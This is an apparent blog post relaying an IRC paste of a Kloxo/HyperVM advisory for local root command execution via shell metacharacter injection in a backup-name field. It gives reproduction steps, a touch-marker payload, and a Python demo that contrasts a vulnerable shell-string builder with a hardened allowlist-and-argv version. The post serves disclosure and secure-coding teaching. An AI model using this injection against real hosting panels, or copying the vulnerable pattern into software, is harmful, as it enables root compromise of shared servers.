This morning, I woke up to this.
[11:15:39] <@nenolod> #####################################################################
[11:15:39] <@nenolod> # ISSUE #11 - metachar injection, local command execution as root
[11:15:39] <@nenolod> #####################################################################
[11:15:39] <@nenolod> Local users can execute any command(s) of their choice as root via
[11:15:40] <@nenolod> metacharacter injection in the backup initial string.
[11:15:40] <@nenolod> 1. Log into Kloxo
[11:15:41] <@nenolod> 2. Click "Backup Home"
[11:15:41] <@nenolod> 3. In the box titled "Backup File Initial String", enter:
[11:15:42] <@nenolod> ; /bin/touch /tmp/i_am_root ;
[11:15:42] <@nenolod> 4. Click "Backup Now"
[11:15:43] <@nenolod> Observe:
[11:15:43] <@nenolod> [user1@testing574 user1]$ ls -l /tmp/i_am_root
[11:15:44] <@nenolod> -rw-r--r-- 1 root root 0 May 20 21:50 /tmp/i_am_root
So basically the gist of it is:
- You have a VPS on a host that runs HyperVM (which covers close to all VPS companies out there).
- Someone else on the same HyperVM installation finds out about this.
- They root the physical box.
- ???
- PROFIT! (for the hacker)
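To make the bug in the advisory concrete, here is an added example (my own code, not Kloxo's or LxLabs'): a builder that splices the "initial string" into a shell command the way a root-owned backup helper might, run through a real shell against a throwaway directory to show that the `; touch ... ;` payload lands, beside a hardened builder that allowlists the field and executes tar by argv with no shell at all. The command line, field handling and paths are assumptions modelled on the advisory, not the panel's actual code.

```python
"""Shell-metacharacter injection in a backup-name field, and one hardened form.

Added example modelled on the advisory above; the tar command, field
handling and paths are assumptions, not Kloxo's own code.
"""
import os
import re
import subprocess
import tempfile

# Constructed payload with the same shape as the one in the advisory.
INJECTION_PAYLOAD = "; /bin/touch /tmp/i_am_root ;"


def build_backup_command_vulnerable(initial: str, home_dir: str, backup_dir: str) -> str:
    """Assumed vulnerable pattern: the user-supplied prefix is pasted into one
    string that a root-owned helper later hands to the shell (system()/popen()).
    Nothing stops ';', '|', '$(...)' or backticks from ending the tar command
    and starting another one, which then also runs as root."""
    return f"tar czf {backup_dir}/{initial}-home.tar.gz {home_dir}"


# Allowlist: letters, digits, '_', '.', '-' only, at most 64 characters, and
# the first character must be a letter or digit.  The leading-dash rule matters
# even once a shell is out of the picture: a value starting with '--' would be
# parsed by tar as an option (e.g. --checkpoint-action), not as a file name.
_INITIAL_RE = re.compile(r"^[A-Za-z0-9][A-Za-z0-9_.-]{0,63}$")


def validate_initial_string(initial: str) -> bool:
    """True only for values that can never be read as shell syntax or a tar option."""
    return _INITIAL_RE.fullmatch(initial) is not None


def build_backup_argv_safe(initial: str, home_dir: str, backup_dir: str) -> list:
    """Hardened form: reject anything outside the allowlist, then build an argv
    list so the prefix is always exactly one argument, whatever it contains."""
    if not validate_initial_string(initial):
        raise ValueError(f"rejected backup initial string: {initial!r}")
    archive = os.path.join(backup_dir, f"{initial}-home.tar.gz")
    return ["tar", "czf", archive, home_dir]


def run_backup_safe(initial: str, home_dir: str, backup_dir: str) -> int:
    """Execute the hardened argv with shell=False and return tar's exit status."""
    argv = build_backup_argv_safe(initial, home_dir, backup_dir)
    return subprocess.run(argv, shell=False, check=False, capture_output=True).returncode


def demo_injection() -> bool:
    """Feed the vulnerable builder a touch payload aimed at a temp directory and
    run the result through /bin/sh, as system() would.  tar itself fails (the
    home directory is constructed and does not exist), but the ';' ends that
    command and touch runs anyway.  Returns True if the marker file appeared."""
    with tempfile.TemporaryDirectory() as tmp:
        marker = os.path.join(tmp, "i_am_root")
        payload = f"; touch {marker} ;"                      # constructed payload
        cmd = build_backup_command_vulnerable(payload, "/home/user1", tmp)
        subprocess.run(cmd, shell=True, check=False, capture_output=True)
        return os.path.exists(marker)


if __name__ == "__main__":
    print("vulnerable command:", build_backup_command_vulnerable(INJECTION_PAYLOAD, "/home/user1", "/backups"))
    print("injection landed:", demo_injection())
    print("hardened argv:   ", build_backup_argv_safe("user1_2009-05-20", "/home/user1", "/backups"))
    try:
        build_backup_argv_safe(INJECTION_PAYLOAD, "/home/user1", "/backups")
    except ValueError as err:
        print("hardened builder:", err)
```

Run it as an unprivileged user and the marker file still appears, because the point is not who runs it but that the field reaches a shell at all; in the advisory the helper runs as root, so the same payload gives root. Note that the hardened builder does two things, and both are needed: the argv list keeps the value from ever being parsed by a shell, and the allowlist keeps it from being parsed by tar as an option. Filtering only `;` and `|` (a denylist) would still leave backticks, `$(...)`, newlines and the option case open.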
I for one have backed up all the (important) shit that I had stored on any HyperVM-based VPSes, and I recommend you do the same.
The full vulnerability report is located at http://www.milw0rm.com/exploits/8880.